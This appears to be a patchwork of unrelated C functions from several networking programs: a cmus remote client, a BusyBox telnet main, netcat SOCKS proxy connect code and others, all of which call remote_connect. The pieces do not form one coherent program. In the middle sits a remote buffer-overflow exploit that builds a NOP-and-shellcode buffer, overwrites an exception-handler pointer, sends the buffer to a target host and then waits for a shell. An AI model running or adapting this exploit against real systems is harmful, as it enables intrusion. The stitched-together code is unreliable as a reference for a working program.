int main(int argc, char **argv)
{
if (!parse_options(argc, argv)) {
fprintf(stderr, "Error parsing command line.\n");
return 1;
}
if (remote_connect(cmd.socket_path) != 0)
return 1;
if (cmd.cmd_toggle_display)
write_all(sock_fd, "toggle display", 14);
if (cmd.cmd_today)
write_all(sock_fd, "select today", 12);
if (cmd.cmd_next_month)
write_all(sock_fd, "next month", 10);
if (cmd.cmd_prev_month)
write_all(sock_fd, "prev month", 10);
if (cmd.cmd_next_year)
write_all(sock_fd, "next year", 9);
if (cmd.cmd_prev_year)
write_all(sock_fd, "prev year", 9);
close(sock_fd);
return 0;
}
int SoundIP::getstream()
{
struct addrinfo hints;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = portmode_udp ? SOCK_DGRAM : SOCK_STREAM;
hints.ai_protocol = portmode_udp ? IPPROTO_UDP : IPPROTO_TCP;
if (portmode_udp) {
hints.ai_flags = AI_PASSIVE;
udp_connected = false;
stream = remote_connect(NULL, m_port, hints);
} else
stream = remote_connect(m_host, m_port, hints);
return stream;
}
int main(int argc, char *argv[]) {
int s,position;
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
banner();
if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
position = 0;
printf("[+] Creating evil buffer\n");
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(attack)); // +3 == \r + \n + 0x00
memset(buffer,0x90,BUFFSIZE); // Fill with nops
inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode
memset(buffer,0x41,68); // First comes the ascii
position = 68;
memcpy(buffer+position,DEADRET,4);
position = 680 - (strlen(shellcode) + 100); // 680 : Pointer to next Execption structure
memcpy(buffer+position,shellcode,strlen(shellcode));
position += strlen(shellcode)+100;
memcpy(buffer+position,jmpover,4); position += 4;
memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4;
position += 8; // 8 bytes more nops
memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
position += 8; // 8 bytes more nops
memset(buffer+position,0x00,1); // End
sprintf(request,attack,buffer);
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
printf("[+] Done - Wait for shell on port %s\n",argv[4]);
close(s);
free(buffer);
buffer = NULL;
return 0;
}
int main(int argc, char *argv[])
{
char server_buf[256];
char *server = NULL;
char *play_file = NULL;
char *volume = NULL;
char *seek = NULL;
int query = 0;
int i, nr_cmds = 0;
int context = 'p';
program_name = argv[0];
argv++;
while (1) {
int idx;
char *arg;
idx = get_option(&argv, options, &arg);
if (idx < 0)
break;
flags[idx] = 1;
switch ((enum flags)idx) {
case FLAG_HELP:
printf(usage, program_name, program_name, program_name);
return 0;
case FLAG_VERSION:
printf("cmus " VERSION "\nCopyright 2004-2006 Timo Hirvonen\n");
return 0;
case FLAG_SERVER:
server = arg;
break;
case FLAG_PASSWD:
passwd = arg;
break;
case FLAG_VOLUME:
volume = arg;
nr_cmds++;
break;
case FLAG_SEEK:
seek = arg;
nr_cmds++;
break;
case FLAG_QUERY:
query = 1;
nr_cmds++;
break;
case FLAG_FILE:
play_file = arg;
nr_cmds++;
break;
case FLAG_LIBRARY:
context = 'l';
break;
case FLAG_PLAYLIST:
context = 'p';
break;
case FLAG_QUEUE:
context = 'q';
break;
case FLAG_PLAY:
case FLAG_PAUSE:
case FLAG_STOP:
case FLAG_NEXT:
case FLAG_PREV:
case FLAG_REPEAT:
case FLAG_SHUFFLE:
case FLAG_CLEAR:
nr_cmds++;
break;
case FLAG_RAW:
raw_args = 1;
break;
}
}
if (nr_cmds && raw_args)
die("don't mix raw and cooked stuff\n");
if (server == NULL) {
const char *config_dir = getenv("CMUS_HOME");
if (config_dir && config_dir[0]) {
snprintf(server_buf, sizeof(server_buf), "%s/socket", config_dir);
} else {
const char *home = getenv("HOME");
if (!home)
die("error: environment variable HOME not set\n");
snprintf(server_buf, sizeof(server_buf), "%s/.cmus/socket", home);
}
server = server_buf;
}
remote_connect(server);
if (raw_args) {
while (*argv)
send_cmd("%s\n", *argv++);
return 0;
}
if (nr_cmds == 0 && argv[0] == NULL) {
char line[512];
while (fgets(line, sizeof(line), stdin))
write_line(line);
return 0;
}
if (flags[FLAG_CLEAR])
send_cmd("clear -%c\n", context);
for (i = 0; argv[i]; i++) {
char *filename = file_url_absolute(argv[i]);
send_cmd("add -%c %s\n", context, filename);
free(filename);
}
if (flags[FLAG_REPEAT])
send_cmd("toggle repeat\n");
if (flags[FLAG_SHUFFLE])
send_cmd("toggle shuffle\n");
if (flags[FLAG_STOP])
send_cmd("player-stop\n");
if (flags[FLAG_NEXT])
send_cmd("player-next\n");
if (flags[FLAG_PREV])
send_cmd("player-prev\n");
if (flags[FLAG_PLAY])
send_cmd("player-play\n");
if (flags[FLAG_PAUSE])
send_cmd("player-pause\n");
if (flags[FLAG_FILE])
send_cmd("player-play %s\n", file_url_absolute(play_file));
if (volume)
send_cmd("vol %s\n", volume);
if (seek)
send_cmd("seek %s\n", seek);
if (query)
send_cmd("status\n");
return 0;
}
extern int telnet_main(int argc, char** argv)
{
struct in_addr host;
int port;
int len;
#ifdef USE_POLL
struct pollfd ufds[2];
#else
fd_set readfds;
int maxfd;
#endif
#ifdef BB_FEATURE_AUTOWIDTH
struct winsize winp;
if( ioctl(0, TIOCGWINSZ, &winp) == 0 ) {
win_width = winp.ws_col;
win_height = winp.ws_row;
}
#endif
#ifdef BB_FEATURE_TELNET_TTYPE
ttype = getenv("TERM");
#endif
memset(&G, 0, sizeof G);
if (tcgetattr(0, &G.termios_def) < 0)
exit(1);
G.termios_raw = G.termios_def;
cfmakeraw(&G.termios_raw);
if (argc < 2) show_usage();
port = (argc > 2)? getport(argv[2]): 23;
host = getserver(argv[1]);
G.netfd = remote_connect(host, port);
signal(SIGINT, fgotsig);
#ifdef USE_POLL
ufds[0].fd = 0; ufds[1].fd = G.netfd;
ufds[0].events = ufds[1].events = POLLIN;
#else
FD_ZERO(&readfds);
FD_SET(0, &readfds);
FD_SET(G.netfd, &readfds);
maxfd = G.netfd + 1;
#endif
while (1)
{
#ifndef USE_POLL
fd_set rfds = readfds;
switch (select(maxfd, &rfds, NULL, NULL, NULL))
#else
switch (poll(ufds, 2, -1))
#endif
{
case 0:
/* timeout */
case -1:
/* error, ignore and/or log something, bay go to loop */
if (G.gotsig)
conescape();
else
sleep(1);
break;
default:
#ifdef USE_POLL
if (ufds[0].revents) /* well, should check POLLIN, but ... */
#else
if (FD_ISSET(0, &rfds))
#endif
{
len = read(0, G.buf, DATABUFSIZE);
if (len <= 0)
doexit(0);
TRACE(0, ("Read con: %d\n", len));
handlenetoutput(len);
}
#ifdef USE_POLL
if (ufds[1].revents) /* well, should check POLLIN, but ... */
#else
if (FD_ISSET(G.netfd, &rfds))
#endif
{
len = read(G.netfd, G.buf, DATABUFSIZE);
if (len <= 0)
{
WriteCS(1, "Connection closed by foreign host.\r\n");
doexit(1);
}
TRACE(0, ("Read netfd (%d): %d\n", G.netfd, len));
handlenetinput(len);
}
}
}
}
int
socks_connect(const char *host, const char *port,
struct addrinfo hints __attribute__ ((__unused__)),
const char *proxyhost, const char *proxyport, struct addrinfo proxyhints,
int socksv, const char *proxyuser)
{
int proxyfd, r, authretry = 0;
size_t hlen, wlen;
unsigned char buf[1024];
size_t cnt;
struct sockaddr_storage addr;
struct sockaddr_in *in4 = (struct sockaddr_in *)&addr;
struct sockaddr_in6 *in6 = (struct sockaddr_in6 *)&addr;
in_port_t serverport;
const char *proxypass = NULL;
if (proxyport == NULL)
proxyport = (socksv == -1) ? HTTP_PROXY_PORT : SOCKS_PORT;
/* Abuse API to lookup port */
if (decode_addrport("0.0.0.0", port, (struct sockaddr *)&addr,
sizeof(addr), 1, 1) == -1)
errx(1, "unknown port \"%.64s\"", port);
serverport = in4->sin_port;
again:
if (authretry++ > 3)
errx(1, "Too many authentication failures");
proxyfd = remote_connect(proxyhost, proxyport, proxyhints);
if (proxyfd < 0)
return (-1);
if (socksv == 5) {
if (decode_addrport(host, port, (struct sockaddr *)&addr,
sizeof(addr), 0, 1) == -1)
addr.ss_family = 0; /* used in switch below */
/* Version 5, one method: no authentication */
buf[0] = SOCKS_V5;
buf[1] = 1;
buf[2] = SOCKS_NOAUTH;
cnt = atomicio(vwrite, proxyfd, buf, 3);
if (cnt != 3)
err(1, "write failed (%zu/3)", cnt);
cnt = atomicio(read, proxyfd, buf, 2);
if (cnt != 2)
err(1, "read failed (%zu/3)", cnt);
if (buf[1] == SOCKS_NOMETHOD)
errx(1, "authentication method negotiation failed");
switch (addr.ss_family) {
case 0:
/* Version 5, connect: domain name */
/* Max domain name length is 255 bytes */
hlen = strlen(host);
if (hlen > 255)
errx(1, "host name too long for SOCKS5");
buf[0] = SOCKS_V5;
buf[1] = SOCKS_CONNECT;
buf[2] = 0;
buf[3] = SOCKS_DOMAIN;
buf[4] = hlen;
memcpy(buf + 5, host, hlen);
memcpy(buf + 5 + hlen, &serverport, sizeof serverport);
wlen = 7 + hlen;
break;
case AF_INET:
/* Version 5, connect: IPv4 address */
buf[0] = SOCKS_V5;
buf[1] = SOCKS_CONNECT;
buf[2] = 0;
buf[3] = SOCKS_IPV4;
memcpy(buf + 4, &in4->sin_addr, sizeof in4->sin_addr);
memcpy(buf + 8, &in4->sin_port, sizeof in4->sin_port);
wlen = 10;
break;
case AF_INET6:
/* Version 5, connect: IPv6 address */
buf[0] = SOCKS_V5;
buf[1] = SOCKS_CONNECT;
buf[2] = 0;
buf[3] = SOCKS_IPV6;
memcpy(buf + 4, &in6->sin6_addr, sizeof in6->sin6_addr);
memcpy(buf + 20, &in6->sin6_port,
sizeof in6->sin6_port);
wlen = 22;
break;
default:
errx(1, "internal error: silly AF");
}
cnt = atomicio(vwrite, proxyfd, buf, wlen);
if (cnt != wlen)
err(1, "write failed (%zu/%zu)", cnt, wlen);
cnt = atomicio(read, proxyfd, buf, 4);
if (cnt != 4)
err(1, "read failed (%zu/4)", cnt);
if (buf[1] != 0)
errx(1, "connection failed, SOCKS error %d", buf[1]);
switch (buf[3]) {
case SOCKS_IPV4:
cnt = atomicio(read, proxyfd, buf + 4, 6);
if (cnt != 6)
err(1, "read failed (%d/6)", cnt);
break;
case SOCKS_IPV6:
cnt = atomicio(read, proxyfd, buf + 4, 18);
if (cnt != 18)
err(1, "read failed (%d/18)", cnt);
break;
default:
errx(1, "connection failed, unsupported address type");
}
} else if (socksv == 4) {
/* This will exit on lookup failure */
decode_addrport(host, port, (struct sockaddr *)&addr,
sizeof(addr), 1, 0);
/* Version 4 */
buf[0] = SOCKS_V4;
buf[1] = SOCKS_CONNECT; /* connect */
memcpy(buf + 2, &in4->sin_port, sizeof in4->sin_port);
memcpy(buf + 4, &in4->sin_addr, sizeof in4->sin_addr);
buf[8] = 0; /* empty username */
wlen = 9;
cnt = atomicio(vwrite, proxyfd, buf, wlen);
if (cnt != wlen)
err(1, "write failed (%zu/%zu)", cnt, wlen);
cnt = atomicio(read, proxyfd, buf, 8);
if (cnt != 8)
err(1, "read failed (%zu/8)", cnt);
if (buf[1] != 90)
errx(1, "connection failed, SOCKS error %d", buf[1]);
} else if (socksv == -1) {
/* HTTP proxy CONNECT */
/* Disallow bad chars in hostname */
if (strcspn(host, "\r\n\t []:") != strlen(host))
errx(1, "Invalid hostname");
/* Try to be sane about numeric IPv6 addresses */
if (strchr(host, ':') != NULL) {
r = snprintf(buf, sizeof(buf),
"CONNECT [%s]:%d HTTP/1.0\r\n",
host, ntohs(serverport));
} else {
r = snprintf(buf, sizeof(buf),
"CONNECT %s:%d HTTP/1.0\r\n",
host, ntohs(serverport));
}
if (r == -1 || (size_t)r >= sizeof(buf))
errx(1, "hostname too long");
r = strlen(buf);
cnt = atomicio(vwrite, proxyfd, buf, r);
if (cnt != r)
err(1, "write failed (%zu/%d)", cnt, r);
if (authretry > 1) {
char resp[1024];
proxypass = getproxypass(proxyuser, proxyhost);
r = snprintf(buf, sizeof(buf), "%s:%s",
proxyuser, proxypass);
if (r == -1 || (size_t)r >= sizeof(buf) ||
b64_ntop(buf, strlen(buf), resp,
sizeof(resp)) == -1)
errx(1, "Proxy username/password too long");
r = snprintf(buf, sizeof(buf), "Proxy-Authorization: "
"Basic %s\r\n", resp);
if (r == -1 || (size_t)r >= sizeof(buf))
errx(1, "Proxy auth response too long");
r = strlen(buf);
if ((cnt = atomicio(vwrite, proxyfd, buf, r)) != r)
err(1, "write failed (%zu/%d)", cnt, r);
}
/* Terminate headers */
if ((r = atomicio(vwrite, proxyfd, "\r\n", 2)) != 2)
err(1, "write failed (2/%d)", r);
/* Read status reply */
proxy_read_line(proxyfd, buf, sizeof(buf));
if (proxyuser != NULL &&
strncmp(buf, "HTTP/1.0 407 ", 12) == 0) {
if (authretry > 1) {
fprintf(stderr, "Proxy authentication "
"failed\n");
}
close(proxyfd);
goto again;
} else if (strncmp(buf, "HTTP/1.0 200 ", 12) != 0 &&
strncmp(buf, "HTTP/1.1 200 ", 12) != 0)
errx(1, "Proxy error: \"%s\"", buf);
/* Headers continue until we hit an empty line */
for (r = 0; r < HTTP_MAXHDRS; r++) {
proxy_read_line(proxyfd, buf, sizeof(buf));
if (*buf == '\0')
break;
}
if (*buf != '\0')
errx(1, "Too many proxy headers received");
} else
errx(1, "Unknown proxy protocol %d", socksv);
return (proxyfd);
}
int
socks_connect (char *host, char *port, struct addrinfo hints,
char *proxyhost, char *proxyport, struct addrinfo proxyhints)
{
int proxyfd;
unsigned char buf[SOCKS_MAXCMDSZ];
ssize_t cnt;
in_addr_t serveraddr;
in_port_t serverport;
if (proxyport)
proxyfd = remote_connect(proxyhost, proxyport, proxyhints);
else
proxyfd = remote_connect(proxyhost, SOCKS_PORT, proxyhints);
if (!proxyfd)
return -1;
serveraddr = decode_addr (host);
serverport = decode_port (port);
/* Version 5, one method: no authentication */
buf[0] = SOCKS_VERSION;
buf[1] = 1;
buf[2] = SOCKS_NOAUTH;
cnt = write (proxyfd, buf, 3);
if (cnt == -1)
err (1, "write failed");
if (cnt != 3)
errx (1, "short write, %d (expected 3)", cnt);
read (proxyfd, buf, 2);
if (buf[1] == SOCKS_NOMETHOD)
errx (1, "authentication method negotiation failed");
/* Version 5, connect: IPv4 address */
buf[0] = SOCKS_VERSION;
buf[1] = SOCKS_CONNECT;
buf[2] = 0;
buf[3] = SOCKS_IPV4;
memcpy (buf + 4, &serveraddr, sizeof serveraddr);
memcpy (buf + 8, &serverport, sizeof serverport);
/* XXX Handle short writes better */
cnt = write (proxyfd, buf, 10);
if (cnt == -1)
err (1, "write failed");
if (cnt != 10)
errx (1, "short write, %d (expected 10)", cnt);
/* XXX Handle short reads better */
cnt = read (proxyfd, buf, sizeof buf);
if (cnt == -1)
err (1, "read failed");
if (cnt != 10)
errx (1, "unexpected reply size %d (expected 10)", cnt);
if (buf[1] != 0)
errx (1, "connection failed, SOCKS error %d", buf[1]);
return proxyfd;
}
int main(int argc, char *argv[])
{
char *server = NULL;
char *play_file = NULL;
char *volume = NULL;
char *seek = NULL;
int query = 0;
int i, nr_cmds = 0;
int context = 'p';
program_name = argv[0];
argv++;
while (1) {
int idx;
char *arg;
idx = get_option(&argv, options, &arg);
if (idx < 0)
break;
flags[idx] = 1;
switch ((enum flags)idx) {
case FLAG_HELP:
printf(usage, program_name, program_name, program_name);
return 0;
case FLAG_VERSION:
printf("cmus " VERSION
"\nCopyright 2004-2006 Timo Hirvonen"
"\nCopyright 2008-2015 Various Authors\n");
return 0;
case FLAG_SERVER:
server = arg;
break;
case FLAG_PASSWD:
passwd = arg;
break;
case FLAG_VOLUME:
volume = arg;
nr_cmds++;
break;
case FLAG_SEEK:
seek = arg;
nr_cmds++;
break;
case FLAG_QUERY:
query = 1;
nr_cmds++;
break;
case FLAG_FILE:
play_file = arg;
nr_cmds++;
break;
case FLAG_LIBRARY:
context = 'l';
break;
case FLAG_PLAYLIST:
context = 'p';
break;
case FLAG_QUEUE:
context = 'q';
break;
case FLAG_PLAY:
case FLAG_PAUSE:
case FLAG_STOP:
case FLAG_NEXT:
case FLAG_PREV:
case FLAG_REPEAT:
case FLAG_SHUFFLE:
case FLAG_CLEAR:
nr_cmds++;
break;
case FLAG_RAW:
raw_args = 1;
break;
}
}
if (nr_cmds && raw_args)
die("don't mix raw and cooked stuff\n");
misc_init();
if (server == NULL)
server = xstrdup(cmus_socket_path);
if (!remote_connect(server))
return 1;
if (raw_args) {
while (*argv)
send_cmd("%s\n", *argv++);
return 0;
}
if (nr_cmds == 0 && argv[0] == NULL) {
char line[512];
while (fgets(line, sizeof(line), stdin))
write_line(line);
return 0;
}
if (flags[FLAG_CLEAR])
send_cmd("clear -%c\n", context);
for (i = 0; argv[i]; i++) {
char *filename = file_url_absolute(argv[i]);
send_cmd("add -%c %s\n", context, filename);
free(filename);
}
if (flags[FLAG_REPEAT])
send_cmd("toggle repeat\n");
if (flags[FLAG_SHUFFLE])
send_cmd("toggle shuffle\n");
if (flags[FLAG_STOP])
send_cmd("player-stop\n");
if (flags[FLAG_NEXT])
send_cmd("player-next\n");
if (flags[FLAG_PREV])
send_cmd("player-prev\n");
if (flags[FLAG_PLAY])
send_cmd("player-play\n");
if (flags[FLAG_PAUSE])
send_cmd("player-pause\n");
if (flags[FLAG_FILE])
send_cmd("player-play %s\n", file_url_absolute(play_file));
if (volume)
send_cmd("vol %s\n", volume);
if (seek)
send_cmd("seek %s\n", seek);
if (query)
send_cmd("status\n");
return 0;
}
